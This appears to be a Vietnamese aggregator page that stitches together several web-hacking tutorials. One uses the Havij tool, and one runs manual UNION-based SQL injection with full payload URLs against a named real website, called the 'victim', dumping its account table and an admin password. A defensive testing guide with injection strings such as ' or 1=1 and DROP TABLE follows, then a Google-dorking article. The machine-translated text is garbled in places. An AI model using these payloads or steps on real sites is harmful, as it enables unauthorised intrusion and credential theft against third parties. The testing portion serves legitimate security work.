Xem Nhiều 12/2022 #️ Hack Trang Web Bằng Cách Sử Dụng Havij Sql Injection / 2023 # Top 15 Trend | Karefresh.com

Xem Nhiều 12/2022 # Hack Trang Web Bằng Cách Sử Dụng Havij Sql Injection / 2023 # Top 15 Trend

Cập nhật thông tin chi tiết về Hack Trang Web Bằng Cách Sử Dụng Havij Sql Injection / 2023 mới nhất trên website Karefresh.com. Hy vọng nội dung bài viết sẽ đáp ứng được nhu cầu của bạn, chúng tôi sẽ thường xuyên cập nhật mới nội dung để bạn nhận được thông tin nhanh chóng và chính xác nhất.

Website Hacking: Làm thế nào để Hack trang web bằng cách sử dụng Havij SQL Injection

Đã tôi đã viết rất nhiều bài viết trên trang web hacking trong đó tôi đã giải thích làm thế nào để tìm thấy trang web sql dễ bị tổn thương và làm thế nào để hack rằng cơ sở dữ liệu trang web vv, vào ngày hôm nay trong bài viết này tôi sẽ viết trên nhiều trang web hack hướng dẫn sử dụng Havij SQL Injection. Sử dụng Havij SQL Injection, bạn có thể dễ dàng hack trang web tên người dùng và mật khẩu.

Havji là một công cụ tiêm SQL. Nhưng có thêm kỹ năng tuyệt vời như tìm bảng quản trị, nứt băm. Bạn có thể sử dụng nó thay vì cách thông thường của SQL injection. Nó đặc biệt là cho người mới bắt đầu một chương trình uselful.

Bằng cách sử dụng công cụ Havij SQL Injection bạn sẽ nhận được dưới thông tin của trang web,

Đừng quên để đăng ký với nguồn cấp dữ liệu RSS của chúng tôi

Các bước để Hack trang web bằng cách sử dụng Havij SQL Injection

Bước 2: Chạy phần mềm Havij SQL Injection và sao chép và dán liên kết trang web dễ bị tổn thương như minh hoạ trong hình,

Tham khảo các bài viết trước đây của trang web hack để tìm trang web dễ bị tổn thương.

Bước 4: Sau đó, nó cho thấy một số thông điệp đó. Là cảnh báo về nó và phải hiển thị kiên nhẫn cho đôi khi tìm thấy nó vulernable và loại tiêm và nếu máy chủ db mysql và nó sẽ tìm thấy cơ sở dữ liệu tên. Sau đó sau khi nhận được cơ sở dữ liệu của nó là tên như xxxx_xxxx

Bước 5: Sau đó di chuyển đến một chiến dịch để tìm bảng bằng cách nhấp vào “bảng” như hình hiển thị. Bây giờ bấm “Nhận được bảng” sau đó chờ đợi một thời gian nếu cần thiết

Bước 6: Sau khi được thành lập các bảng, bạn có thể thấy sẽ có “người dùng” đặt đánh dấu vào nó và nhấp chuột vào “nhận được cột” tab như minh hoạ trong hình

Bước 7: Trong đó chỉ cần đặt đánh dấu tên người dùng và mật khẩu và nhấp vào “Nhận được dữ liệu”

Cuối cùng, bạn có bây giờ tên người dùng và mật khẩu của admin…

Đèo sẽ nhận được là md5, bạn có thể crack nó cũng sử dụng công cụ này như minh hoạ trong hình.

Hack Web Bị Lỗi Sql Injection Cơ Bản / 2023

Lưu ý: bài viết chỉ mang tính chất phục vụ cho học tập, tìm hiểu cách thức hoạt động để phòng tránh tốt hơn cho đồ án của bạn, mọi hành vi của các bạn chúng tôi sẽ không chịu trách nhiệm!

Bài viết thực hiện dựa trên trình duyệt Firefox

I. LÝ THUYẾT (để thao tác thành công, các bạn nên đọc kỹ phần thực hành)

Thêm vào cuối liên kết trên một trong các meta character đã nói ở trên, chẳng hạn ta thêm vào dấu nháy đơn: http://zerocoolhf.altervista.org/level1.php?id=1'

Thông báo lỗi từ mysql xuất hiện, như vậy trang web này đã bị dính lỗi SQL injection.

2. Xác định số lượng cột trong mệnh đề select

Union là từ khóa dùng để gộp kết quả của nhiều mệnh đề select do đó trong mỗi mệnh đề select đòi hỏi số lượng các trường đều phải bằng nhau và đều bằng số lượng các trường được select trong mệnh đề select ban đầu. Chúng ta sẽ sử dụng điều này để xác định số lượng cột của cở sở dữ liệu.

Cụ thể, chúng ta sẽ thực hiện thử dần bằng cách tăng dần số lượng cột trong mệnh đề select sau union (bắt đầu từ 1). Khi nào không thấy thông báo lỗi xuất hiện thì đó chính là số lượng cột cần tìm.

Một cách nhanh hơn là sử dụng ‘order by’. Từ khóa ‘order by’ được dùng để sắp xếp thứ tự cho các bản ghi thu được trong mệnh để select. Sau order by có thể là tên một cột để xác định rằng kết quả thu về sẽ được sắp xếp theo giá trị của cột đó (tăng dần hoặc giảm dần). Sau ‘order by’ cũng có thể là số thứ tự vị trí của cột đó. Nếu giá trị sau order lớn hơn số cột được select thì chúng ta sẽ thấy thông báo lỗi.

Quay trở lại ví dụ:

http://zerocoolhf.altervista.org/level1.php?id=1 order by 1-- - http://zerocoolhf.altervista.org/level1.php?id=1 order by 2-- - http://zerocoolhf.altervista.org/level1.php?id=1 order by 3-- - http://zerocoolhf.altervista.org/level1.php?id=1 order by 4-- -

Thông báo lỗi xuất hiện. Như vậy, ta xác định được số cột là 3.

3. Xác định thông tin

Để biết được tên bảng, tên cột, ta sử dụng đối tượng information_schema. Đối tượng này cung cấp các thông tin về tables, columns, views và procedures… của cơ sở dữ liệu.

Tiếp tục với ví dụ:

http://zerocoolhf.altervista.org/level1.php?id=-1 union select 1,2,3-- -

Lỗi trả về cho ta thấy có vẻ như ‘unio’ đã bị xóa mất. Thử lại với:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select 1,2,3-- -

Thành công. Ta sẽ thấy cột số 2 và 3 bị lỗi. Lấy phiên bản của hệ quản trị cơ sở dữ liệu và tên cơ sở dữ liệu:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select 1,version(),database()-- -

Như vậy tên cơ sở dữ liệu là my_zerocoolhf và phiên bản của hệ quản trị cơ sở dữ liệu là MySQL 5.1.71-community-log. Tiếp tục, lấy tên các bảng trong cơ sở dữ liệu:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select all 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -

Cơ sở dữ liệu có 2 bảng là auth và book. Chúng ta sẽ thử lấy nội dung các bản ghi trong bảng book. Trước hết xác định các trường của bảng book. Thực hiện:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select all 1,group_concat(column_name),3 from information_schema.columns where table_name=0x626f6f6b-- -

(0x626f6f6b là mã hex của tên bảng book, tương tự nếu muốn lấy tên các trường của bảng auth thì chỉ cần thay mã hex của auth vào vị trí của 0x626f6f6b)

Tên các trường: id, title, price, author. Bây giờ ta sẽ lấy nội dung các bản ghi trong cơ sở dữ liệu:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select all 1,group_concat(id,0x3a,title,0x3a,price,0x3a,author),3 from book-- -

(group_concat để nối nhiều giá trị với nhau. 0x3a là dấu “:”, để ngăn cách cho dễ nhìn)

Như vậy, ta có thể lấy được toàn bộ cơ sở dữ liệu của site bị lỗi SQL injection.

II. THỰC HÀNH

2. 1 cái đầu và những ngón tay =]]z~

Bây Giờ Tiến Hành Với Victim Nhé !

Victim : http://pscells.com ( Hoặc Có Thế Lên Google Gõ “inurl:index.php?id=” Để Dork tìm Site Bị Lỗi SQL )

Đi 1 Vòng Site Tìm Link Có Dạng ?id=

Chẳng hạn như link này : http://pscells.com/chitietsanpham.php?id=40

Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ‘ Vào Và Ta Đc Link Như Thế Này :

http://pscells.com/chitietsanpham.php?id=40 ‘

Nếu Site Có Lỗi Thì Nó Sẽ Hiện Như Thế này :

Vậy : 5 < x < 10

Bây h Dùng Lệnh UNION SELECT để khai thác nó Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8

Ta Sẽ Có Link :http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8 – –

Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :

http://pscells.com/chitietsanpham.php?id= null UNION SELECT 1,2,3,4,5,6,7,8 – –

Vậy Cột 6 Bị Lỗi Nhé Bây giờ ta khai thác với lệnh như sau:

http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database() – –

( Thay Thế group_concat(table_name) vào số cột bị lỗi mà ta đã tìm hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Các Table Có Trong Database )

Và Sau Đó Ta Đc Các Table Của Database Như Hình :

http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database() – –

Thành

http://pscells.com/chitietsanpham. php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e – –

Ta sẽ được:

Đổi link ỡ 1 số chỗ :

http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(id,0x207c20,name,0x207c20,pass,0x207c20),7,8 from taikhoan – –

Xóa Hết Phần Sau Chừa Lại from Và Thêm Tên Table Mà Hồi Nãy Mình Khai Thác Như : taikhoan

Và Ta Sẽ Đc Như Hình :

ID: Admin Pass : @#123@#

Số 1 Là Số User troq site ^^

Thế là xong ! Tìm link admin và đăng nhập vào thôi ^_^ ^_^!!

Hướng Dẫn Test Sql Injection (Ví Dụ Và Cách Phòng Ngừa Các Cuộc Tấn Công Sql Injection) / 2023

Ở bài post này, mình xin giới thiệu với các bạn các ví dụ về SQL Injection và các cách phòng tránh các cuộc tấn công SQL Injection khi test Web.

Trong khi test một website hoặc một hệ thống, mục đích của Tester là đảm bảo sản phẩm được bảo vệ càng nhiều càng tốt.

Security Testing thường được thực hiện cho mục đích này. Để thực hiện loại thử nghiệm này, đầu tiên, chúng ta cần xem xét, những cuộc tấn công nào có khả năng xảy ra nhất. Và SQL Injection là một trong các loại tấn công đó.

SQL Injection là một trong những loại tấn công phổ biến nhất khi nó có thể mang lại nguy hiểm và gây hại cho hệ thống của bạn cũng như những dữ liệu nhạy cảm.

SQL Injection là gì?

Một vài user truyền vào các câu lệnh SQL được thực hiện trên database. Nó khiến cho ứng dụng không thể xử lý dữ liệu do người dùng cung cấp không đúng cách.

Trong trường hợp này, một user độc hại có thể cung cấp những đầu vào không mong muốn cho ứng dụng, sau đó dùng để đóng khung và thực hiện các câu lệnh SQL trên database. Nó gọi là SQL Injection. Hậu quả của một hành động như vậy có thể đáng báo động.

Như tên của nó, mục đích của cuộc tấn công SQL Injection là tiêm những code SQL độc hại.

Mỗi một trường của website là một cánh cổng dẫn đến database. Trong form login, người dùng nhập các dữ liệu login. Trong trường search, người dùng nhập các từ search. Trong form lưu dữ liệu, người dùng nhập các dữ liệu có thể lưu trữ. Tất cả các dữ liệu được chỉ ra đều có thể dẫn đến database.

Thay vì nhập các dữ liệu đúng, bất kỳ một code độc hại nào được nhập vào, đều có thể dẫn đến một số thiệt hại nghiêm trọng cho database và cho cả hệ thống.

SQL Injection được thực hiện với ngôn ngữ lập trình SQL. SQL (Structured Query Language – ngôn ngữ truy vấn cấu trúc) được sử dụng để quản lý các dữ liệu được tổ chức trong database. Do đó mã ngôn ngữ lập trình này đang được sử dụng như một mũi tiêm độc hại.

Đây là một trong các cuộc tấn công phổ biến, vì database được sử dụng cho hầu hết tất cả các công nghệ.

Nhiều ứng dụng sử dụng một vài loại database. Một ứng dụng đang được test có thể có giao diện người dùng chấp nhận đầu vào của người dùng để thực hiện các task sau:

Lưu trữ các dữ liệu được nhập bởi user vào database. Ví dụ: Mỗi khi user nhập dữ liệu vào form và submit, ứng dụng xử lý lưu dữ liệu vào database. Dữ liệu này sau đó sẽ được cung cấp cho user trong cùng một phiên hoặc các phiên tiếp theo.

Rủi ro của SQL Injection

Ngày nay, database được sử dụng cho gần như tất cả các hệ thống và website, vì dữ liệu nên được lưu trữ ở nhiều nơi.

Khi dữ liệu nhạy cảm được lưu trữ trong database, có nhiều rủi ro hơn trong bảo mật hệ thống. Nếu bất kỳ dữ liệu website hoặc blog cá nhân bị đánh cắp, thì sẽ không gây thiệt hại nhiều như dữ liệu ngân hàng bị đánh cắp.

Mục đích chính của cuộc tấn công này là hack database của hệ thống, do đó hậu quả của nó thật sự nguy hại.

Những điều sau đây có thể là kết quả của SQL Injection:

Hack tài khoản của người khác

Ăn cắp và copy dữ liệu nhạy cảm của hệ thống

Thay đổi các dữ liệu nhạy cảm của hệ thống

Xóa dữ liệu nhạy cảm của hệ thống

Hacker có thể login vào ứng dụng như user khác, thậm chí là admin

Hacker có thể xem thông tin cá nhân của user khác. Ví dụ: thông tin chi tiết profile, chi tiết giao dịch,…

Hacker có thể thay đổi thông tin cấu hình của ứng dụng và dữ liệu của các user khác

Hacker có thể sửa cấu trúc database, thậm chí delete bảng trong database

Hacker có thể điều khiển server database và thực hiện câu lệnh trên nó.

Những rủi ro đã liệt kê bên trên có thể thực sự nguy hiểm, vì để restore một database hoặc dữ liệu của nó mất rất nhiều chi phí. Nó có thể làm mất danh tiếng và tiền bạc của công ty bạn để khôi phục dữ liệu và hệ thống bị mất. Vì vậy, cần phải quan tâm cao đến việc bảo vệ hệ thống khỏi các cuộc tấn công, và Security testing là giải pháp tốt cho uy tín sản phẩm và công ty bạn.

Bản chất của cuộc tấn công này

Như đã đề cập phía trên, bản chất của cuộc tấn công này là hack database với mục đích độc hại.

Để thực hiện Security Testing, ban đầu, bạn cần tìm những lỗ hổng của hệ thống và sau đó thông qua chúng gửi những mã SQL độc hại đến database. Nếu có thể thực hiện được, thì những mã SQL độc hại này sẽ được gửi và các hành động gây hại sẽ có thể thực hiện trong database.

Mỗi một trường của một website tương tự như một cánh cổng dẫn vào database. Bất kỳ dữ liệu hoặc đầu vào mà chúng ta thường nhập vào bất kỳ trường nào của hệ thống hoặc trang web đều đi đến database. Do đó, thay vì nhập dữ liệu đúng, nếu chũng ta nhập bất kỳ mã code độc hại nào, nó đều có thể thực hiện câu lệnh truy vấn database và mang lại hậu quả nghiêm trọng.

Tool được đề xuất

### 1. Kiuwan

Dễ dàng tìm kiếm và fix các lỗ hổng như SQL Injection trong code của bạn ở mỗi giai đoạn của SDLC (Software Development Life Cycle – Vòng đời phát triển phần mềm). Kiuwan tuân thủ các tiêu chuẩn bảo mật nghiêm ngặt nhất, bao gồm OWASP, CWE, SANS 25, HIPPA, ….

Tích hợp Kiuwan vào trong IDE để cho phản hồi tức thì trong khi phát triển. Kiuwan hỗ trợ tất ả các ngôn ngữ lập trình chính và tích hợp với các công cụ DevOps hàng đầu.

Để thực hiện cuộc tấn công này, chúng ta phải thay đổi hành động và mục đích của các truy vấn database thích hợp. Một trong các phương thức có thể để thực hiện là làm cho các truy vấn luôn đúng, rồi sau đó chèn vào các mã độc hại. Thay đổi truy vấn database thành luôn đúng có thể được thực hiện với mã code đơn giản như [‘ or 1=1;-].

Tester cần ghi nhớ rằng, việc check thay đổi truy vấn thành luôn đúng có thể được thực hiện hoặc không, các trích dẫn khác nhau nên được thử với single và double. Do đó, nếu chúng ta thử với mã single [‘ or 1=1;-] , thì chúng ta cũng nên thử với mã double [” or 1=1;-].

select from notes nt where nt.subject = ‘searchword’;

Thay cho từ khóa tìm kiếm, chúng ta nhập truy vấn SQL Injection [‘ or 1=1;-], sau đó câu truy vấn sẽ trở thành luôn đúng.

select from notes nt where nt.subject = ‘ ‘ or 1=1;-

Trong trường hợp này, parameter “subject” bị đóng lại với trích dẫn và sau đó chúng ta có code [or 1=1], cái mà sẽ không được thực hiện. Đây là một trong những cách phổ biến nhất và dễ dàng nhất để bắt đầu điều khiển truy vấn.

Một vài code khác có thể sử dụng để làm cho truy vấn luôn đúng, như sau:

Phần quan trọng nhất ở đây là sau đó chúng ta có thể nhập bất kỳ mã độc hại nào mà chúng ta mong muốn thực hiện.

Ví dụ:

Nếu injection này là có thể, thì sau đó chúng ta có thể viết bất kỳ mã độc hại nào. Trong trường hợp này, nó sẽ chỉ phụ thuộc vào kiến thức và ý muốn của người dùng độc hại. Làm thế nào để check SQL Injection?

Việc kiểm tra lỗ hổng này có thể được thực hiện rất dễ dàng. Thỉnh thoảng chỉ cần gõ [‘ or “] vào trường kiểm tra. Nếu nó trả ra bất kỳ thông báo không mong muốn hoặc bất thường nào, chúng ta có thể chắc chắn rằng SQL Injection có thể thực hiện với trường đó.

Ví dụ: Nếu hiển thị message “Internal Server Error” như một kết quả tìm kiếm, chúng ta có thể chắc chắn rằng có thể tấn công vào phần này của hệ thống.

Một số kết quả khác cho biết có thể thực hiện cuộc tấn công SQL Injection:

Hiển thị page trắng

Không có message lỗi hay thành công – chức năng và page không phản ứng với đầu vào

Message thành công cho mã độc hại

Ví dụ: Cùng test xem cửa sổ login có phải là lỗ hổng của SQL Injection không.

Để thực hiện mục đích này, trong trường email và password, chúng ta nhập như sau:

Nếu kết quả trả ra là message lỗi ‘Internal Server Error’ hoặc bất kỳ kết quả không phù hợp được liệt kê khác, chúng ta có thể chắc chắn rằng, có thể tấn công vào trường đó.

Do đó, check SQL Injection với trích dẫn single [‘] là cách khá đáng tin cậy để kiểm tra xem cuộc tấn công có thể thực hiện hay không.

Nếu single quote không trả ra kết quả không thích hợp, chúng ta có thể thử nhập double quote và check kết quả

Ngoài ra, code SQL để thay đổi truy vấn thành luôn đúng cũng là một cách đeẻ check xem cuộc tấn công có thể hay không. Nó đóng tham số và thay đổi truy vấn thành “true”. Do đó nếu không được xác thực, mỗi đầu vào như thế cũng có thể trả ra bất kỳ kết quả không mong đợi tương tự, và cuộc tấn công là có thể trong trường hợp này.

Việc check các cuộc tấn công SQL cũng có thể được thực hiện từ đường dẫn website. Giả sử chúng ta có đường dẫn là: http://www.testing.com/books=1. Trong trường hợp này, “books” là tham số và “1” là giá trị. Nếu chúng ta thay [1] bằng [‘] thì chúng ta có thể check được injection có thể hay không.

Do đó, link http://www.testing.com/books= sẽ được check xem SQL attack có khả thi cho trang web http://www.testing.com hay không

Trong case này, nếu http://www.testing.com/books= trả ra message lỗi như ‘Internal Server Error’ hoặc trang trắng, hoặc bất kỳ message lỗi không mong muốn nào, thì chúng ta có thể chắc chắn rằng SQL Injection là có thể. Sau đó, chúng ta có thể thử gửi nhiều mã SQL phức tạp qua đường dẫn website này.

Để check xem cuộc tấn công là có thể thông qua đường dẫn website hay không, mã như [‘ or 1=1;-] có thể được sử dụng.

Là một tester có kinh nghiệm, tôi muốn nhắc nhở rằng không chỉ có thông báo lỗi không mong muốn có thể được coi là lỗ hổng SQL Injection. Nhiều tester kiểm tra các cuộc tấn công có thể chỉ theo thông báo lỗi.

Tuy nhiên, nên ghi nhớ rằng không có thông báo lỗi xác thực hoặc thông báo thành công cho mã độc cũng có thể là một dấu hiệu, rằng cuộc tấn công này là có thể.

Security Testing Web Application chống lại SQL Injection

Security Testing một ứng dụng web được giải thích với ví dụ đơn giản sau:

Vì hậu quả của việc cho phép kỹ thuật lỗ hổng này có thể nghiêm trọng, cuộc tấn công này nên được thực hiện trong suốt quá trình test bảo mật của ứng dụng. Bây giờ với một cái nhìn tổng quan về kỹ thuật này, chúng ta hãy hiểu một vài ví dụ thực tế về SQL Injection.

SELECT * FROM Users WHERE UserName = ‘” & strUserName & “‘ AND Password = ‘” & strPassword & “‘;”

Nếu tester muốn nhập “John” là strUsername (trong textbox username) và “Smith” là strPassword (trong textbox Password), câu lệnh bên trên sẽ trở thành:

SELECT FROM Users WHERE UserName = ‘John’ AND Password = ‘Smith’;

Nếu tester muốn nhập “John” là strUsername (trong textbox username) và không có strPassword, câu lệnh bên trên sẽ trở thành:

SELECT FROM Users WHERE UserName = ‘John’— AND Password = ‘Smith’;

Lưu ý rằng 1 phần câu lệnh SQL sau John chuyển thành một nhận xét. Nếu có bất kỳ user nào có username là John trong bảng Users, ứng dụng có thể cho phép tester login như user John. Tester có thể xem thông tin chi tiết của John.

Nếu tester hông biết tên của bất kỳ user nào trong ứng dụng thì làm gì? Trong trường hợp này, tester có thể thử với những username chung như admin, administrator, và sysadmin. Nếu không có user nào tồn tại trong database, tester có thể nhập [John’ or ‘x’=’x] như strUsername và [Smith’ or ‘x’=’x] như strPassword. Câu lệnh SQL sẽ trở thành như sau:

SELECT FROM Users WHERE UserName = ‘John’ or ‘x’=’x’ AND Password = ‘Smith’ or ‘x’=’x’;

Vì điều kiện ‘x’=’x’ luôn đúng, nên kết quả sẽ trả về toàn bộ các row của bảng Users. Từ đó, tester có thể login như người dùng đầu tiên trong bảng Users.

Quan trọng: Tester cần yêu cầu quản trị database hoặc developer copy bảng trong câu hỏi trước khi thử các cuộc tấn công sau.

Nếu tester nhập [John’; DROP table users_details;’-] như strUsername và bất kỳ cái gì làm strPassword, câu lệnh SQL sẽ trở thành như sau:

SELECT FROM Users WHERE UserName = ‘John’; DROP table usersdetails;’ -‘ AND Password = ‘Smith’;

Câu lệnh này có thể khiến cho bảng “users_details” bị xóa vĩnh viễn khỏi database.

Các ví dụ trên sử dụng kỹ thuật SQL Injection chỉ với trang login, tester nên sử dụng kỹ thuật test này cho tất cả các page khác của ứng dụng như: search, feedback, …

SQL injection có thể dùng với ứng dụng sử dụng SSL. Thậm chí tường lửa cũng có thể không có khả năng bảo vệ ứng dụng chống lại kỹ thuật này.

Tôi muốn nhắc nhở một lần nữa rằng kỹ thuật tấn công này chỉ test trên môi trường test, không dùng trong môi trường development, production hay bất kỳ một môi trường nào khác.

Các phần dễ bị tấn công khi thực hiện cuộc tấn công này

Trước khi thực hiện quy trình test, mỗi tester nên ít nhiều biết những phần nào dễ bị tấn công nhất đối với cuộc tấn công này.

Nó cũng là cách tốt để lên kế hoạch test những trường nào của hệ thống một cách chính xác và theo thứ tự nào. Tôi đã học được, không nên kiểm tra ngẫu nhiên một số trường để chống lại các cuộc tấn công SQL vì một số trường có thể bị bỏ sót. Vì cuộc tấn công được thực hiện trong database, nên tất cả các phần hệ thống nhập liệu, các trường input, và đường dẫn website đều có thể bị tấn công.

Các phần dễ bị tấn công bao gồm:

Các trường login

Các trường tìm kiếm

Bất kỳ trường nhập liệu và lưu trữ khác

Website link

Quan trọng cần ghi nhớ rằng trong khi test chống lại cuộc tấn công này, không thể chỉ check một hoặc vài trường. Thông thường, một vài trường được bảo vệ khỏi tấn công SQL injection, nhưng các trường khác lại không được bảo vệ. Do đó, không được quên việc test toàn bộ các trường của website.

Test tự động SQL Injection

Vì một số hệ thống hoặc website được test khá phức tạp và có chứa dữ liệu nhạy cảm, nên test thủ công có thể khó khăn và mất nhiều thời gian. Do đó, test để phòng tránh cuộc tấn công SQL Injection bằng các tool đặc biệt có thể thực sự hữu ích.

Một trong các tool SQL Injection là SOAP UI. Nếu bạn thực hiện test hồi quy tự động ở mức độ API, bạn cũng có thể sử dụng tool này để chống lại cuộc tấn công SQL. Trong tool SOAP UI, có sẵn các template có thể sử dụng để test chống lại cuộc tấn công này. Các template đó cũng có thể được bổ sung bằng code của bạn.

Đây là một tool khá tin cậy.

Tuy nhiên, test tự động ở mức độ API là không dễ dàng. Do đó, có một cách khác đó là sử dụng các plugin trình duyệt khác nhau để test tự động.

Cần lưu ý rằng, tool tự động có thể tiết kiệm thời gian, nhưng không phải luôn luôn đáng tin cậy. Nếu bạn test hệ thống ngân hàng hoặc một website với dữ liệu nhạy cảm, tốt nhất nên sử dụng test manual. Nơi bạn có thể xem kết quả chính xác và phân tích chúng. Ngoài ra, trong trường hợp này, chúng tôi có thể chắc chắn rằng, không có gì bị bỏ qua.

So sánh với các cuộc tấn công khác

SQL Injection có thể coi là một trong các cuộc tấn công nguy hiểm nhất, vì nó ảnh hưởng đến database và có thể phá hủy nghiêm trọng dữ liệu cũng như toàn bộ hệ thống của bạn.

Để chắc chắn nó hậu quả nghiêm trọng hơn Javascript Injection hay HTML Injection, chúng ta cùng thực hiện tất cả trên client-side. Để so sánh, với cuộc tấn công này, bạn có quyền truy cập vào toàn bộ cơ sở dữ liệu.

Để test chống lại cuộc tấn công này, bạn phải có kiến thức khá tốt về ngôn ngữ lập trình SQL. Và nói chung, bạn cần biết cách hoạt động của các truy vấn database. Ngoài ra, trong khi thực hiện cuộc tấn công này, bạn cần cẩn thận và quan sát nhiều hơn, vì bất kỳ sự không chính xác nào cũng có thể được để lại dưới dạng lỗ hổng SQL.

All Rights Reserved

Cách Hack Một Trang Web / 2023

Chúng tôi đã nhiều lần viết rằng số lượng trang web bị tấn công ẩn danh (không nhắm mục tiêu) lớn hơn nhiều lần so với số nạn nhân của các cuộc tấn công được nhắm mục tiêu. Theo thống kê của chúng tôi, chỉ có mỗi trang web thứ tư bị tấn công bởi tin tặc, các trang web còn lại đến với chúng tôi để điều trị và bảo vệ là kết quả của một vụ hack và lây nhiễm lớn.

Tìm kiếm các trang web (hàng ngàn trong số chúng) với các thông số yếu tương tự không phải là khó khăn đối với một hacker. Thông tin về các trang web dễ bị tổn thương luôn có thể được truy cập thông qua Cơ sở dữ liệu Google Hacking (GHD) – cơ sở dữ liệu của “dork” – truy vấn tìm kiếm bằng ngôn ngữ meta của Google, cho phép bạn tìm các trang web dễ bị tấn công bởi một số thuộc tính tương tự. Ví dụ: tin tặc có thể tìm thấy tất cả các trang web được lập chỉ mục trong công cụ tìm kiếm với trình cắm dễ bị tấn công hoặc các trang web tiết lộ nội dung của các thư mục, tức là cho phép bạn xem và tải xuống các tệp từ chúng (với mật khẩu, cài đặt, v.v.)

Nếu trang web của bạn có một liên kết yếu và dự án web dễ bị tấn công bởi một loại tấn công nhất định, thì sớm muộn bạn cũng sẽ bị hack. Điều này phải được hiểu bởi mọi quản trị trang web và chủ sở hữu trang web.

Sau này, theo quy định, không tin rằng việc tìm kiếm và hack một trang web dễ bị tấn công có thể được thực hiện chỉ trong vài phút, mà không có bất kỳ công cụ hack chuyên dụng nào trong tay. Do đó, như một minh họa, chúng tôi sẽ đưa ra một ví dụ đơn giản về cách sử dụng các khả năng của Google, những kẻ tấn công tìm và hack các dự án web mà chủ sở hữu không chăm sóc kịp thời hoặc mắc lỗi khi thiết lập lưu trữ.

Lấy ví dụ, hãy xem xét các ứng dụng Dòe xuất hiện trong Cơ sở dữ liệu Google Hacking vào ngày 1 tháng 9 năm 2015. Nó cho phép bạn tìm các trang web có thư mục mở (trong các thư mục đó, bạn không chỉ có thể xem danh sách các tệp dịch vụ mà còn xem nội dung của chúng, ví dụ: tìm mật khẩu).

Chúng tôi gửi yêu cầu này đến công cụ tìm kiếm Google và xem danh sách các trang web có danh sách thư mục mở – đây là những nạn nhân tiềm năng của tin tặc. Chúng tôi chọn ngẫu nhiên từ các trang web được tìm thấy, ví dụ, cuối cùng trong danh sách.

Chúng tôi nhấp vào liên kết – một danh sách các thư mục mở ra, bạn có thể “duyệt” chúng như trong Explorer và do lướt web, bạn có thể nhận thấy tệp chúng tôi trong miền công cộng lưu trữ thông tin đăng nhập và mật khẩu từ cơ sở dữ liệu. Cho rằng đôi khi các tài khoản trùng với FTP hoặc SSH, bằng cách này, hacker có thể truy cập trái phép không chỉ vào cơ sở dữ liệu mà còn cho toàn bộ máy chủ.

Toàn bộ quá trình được mô tả ở trên mất khoảng hai phút, nhưng đối với một tin tặc trong các điều kiện chiến đấu của Cameron, sử dụng các giải pháp tự động, việc này thậm chí còn mất ít thời gian hơn và lượng tài nguyên bị xâm phạm thường lên tới hàng ngàn.

Thật xấu hổ khi nằm trong số những người biến thành con mồi dễ dàng trong tay tin tặc, mặc dù tình huống này rất dễ tránh. Hãy suy nghĩ về việc bảo vệ các dự án web của bạn trước. Nếu trang web của bạn sẽ an toàn hơn một chút so với mức trung bình (với CMS ngoài hộp và cài đặt mặc định), thì vấn đề hack không phù hợp sẽ bỏ qua bạn.

Tại sao điều này có thể?

Nhiều người, thậm chí là các quản trị web đáng kính, đôi khi chỉ đơn giản là quên / quên thực tế là ngay khi tài nguyên xuất hiện trong không gian Internet, hãy tìm kiếm robot với sự cho phép và không có nó sẽ cuộn nó lên xuống. Và tin tôi đi, một vài trong số các trình thu thập dữ liệu web đang chú ý đến các chỉ thị được quy định trong các tệp chúng tôi hoặc htaccess. Đây là hai công cụ tối ưu hóa SEO khá đặc biệt, nhưng từ quan điểm bảo mật trang web hoặc blog, họ (tin tôi đi!) Chơi một trò đùa RẤT xấu với quản trị viên, người phải cân bằng giữa phát triển SEO có thẩm quyền và bảo vệ đáng tin cậy.

Một trang web hack đạt được những gì?

Hacking có thể gây hại cho bất kỳ doanh nghiệp đang phát triển, dù nhỏ hay lớn. Sử dụng các phương pháp hack, bạn có thể đánh cắp dữ liệu bí mật của bất kỳ công ty nào, giành toàn quyền kiểm soát máy tính của bạn hoặc thậm chí làm hỏng trang web của bạn bất cứ lúc nào.

Có những trường đào tạo đặc biệt được tạo ra để đảm bảo an toàn thông tin cho các công ty khác nhau và để ngăn chặn các cuộc tấn công vào họ. Tiến hành các khóa học về hack đạo đức. Bằng cách này hay cách khác, họ dạy hack.

Tất cả các phương pháp hack đạo đức được dạy trong các tổ chức như vậy là rất quan trọng đối với bất kỳ công ty. Họ giúp ngăn chặn việc đánh cắp thông tin bí mật của cô. Để đảm bảo an ninh cho bất kỳ hệ thống nào, bạn cần biết cách hack một trang web hoặc những phương thức nào có thể được tin tặc sử dụng để hack một trang web. Vì vậy, hãy tìm ra phương pháp hack trang web tồn tại.

Cách hack một trang web – khám phá Google Dorki.

Google Dorki – các truy vấn được chọn đặc biệt với sự trợ giúp mà bạn có thể tìm thấy các tệp hoặc trang không mong muốn cho họ, nhưng vẫn được chủ sở hữu trang web mở để xem chung. Đây là những nhóm đặc biệt (thường xuyên hơn – nhiều kết hợp yêu cầu, được sắp xếp hợp lý) sẽ dẫn người bẻ khóa tò mò đến địa điểm chính xác mà anh ta quan tâm trên các trang web. Tuy nhiên, danh sách các lệnh cho người dùng không thiên vị sẽ không nói gì. Và đối với hacker, điều quan trọng nhất khi khám phá Dorkov sẽ là:

phát hiện phần mềm dễ bị tổn thương

tìm kiếm các tập tin và thư mục cần được ẩn khỏi mắt người dùng thông thường

